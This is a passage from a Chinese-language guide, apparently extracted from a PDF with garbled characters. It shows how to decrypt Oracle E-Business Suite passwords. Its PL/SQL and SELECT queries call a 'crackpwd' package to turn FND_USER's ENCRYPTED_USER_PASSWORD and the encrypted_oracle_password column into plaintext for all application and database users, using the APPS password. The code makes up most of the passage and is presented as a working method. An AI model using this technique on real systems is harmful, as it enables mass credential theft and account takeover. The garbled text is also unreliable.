58、stFndPwd); END IF; END;注: guestUserPwd :=GUEST/ORACLE;-Can any user password 上面這一行可以改成任何一個(gè)User的username/password,賬號和密碼之間用/隔開以上程序可以用toad執(zhí)行5. 經(jīng)過FND_USER:ENCRYPTED_USER_PASSWORD獲得明文密碼的方法SET SERVEROUT ONDECLARE v_encrypted_pwd VARCHAR2 (100); v_apps_pwd VARCHAR2 (100); v_user_pwd VARCHAR (100);BEGIN v_e

59、ncrypted_pwd :=ZGA05468EA2C7A00CE5D9ED6562B352364325D40A247D583C10B916D88062771250F4BE653891CA90671C74187B132118335;-getENCRYPTED_USER_PASSWORD from fnd_user IF v_apps_pwd IS NULL THEN v_apps_pwd := APPS; END IF; v_user_pwd := crackpwd.getpwd (v_apps_pwd, v_encrypted_pwd); DBMS_OUTPUT.put_line (v_us

60、er_pwd);END;6. 經(jīng)過上面建立的Package獲得一切Oracle ERP Application User 密碼的方法SELECT user_name,CrackPwd.getpwd(APPS,ENCRYPTED_USER_PASSWORD)pwdFROMAPPS.fnd_user7. 經(jīng)過上面建立的Package獲得一切Oracle ERP Database User密碼的方法select fou.oracle_username,CrackPwd.getpwd(APPS,encrypted_oracle_password) pwd fromAPPS.fnd_oracle_use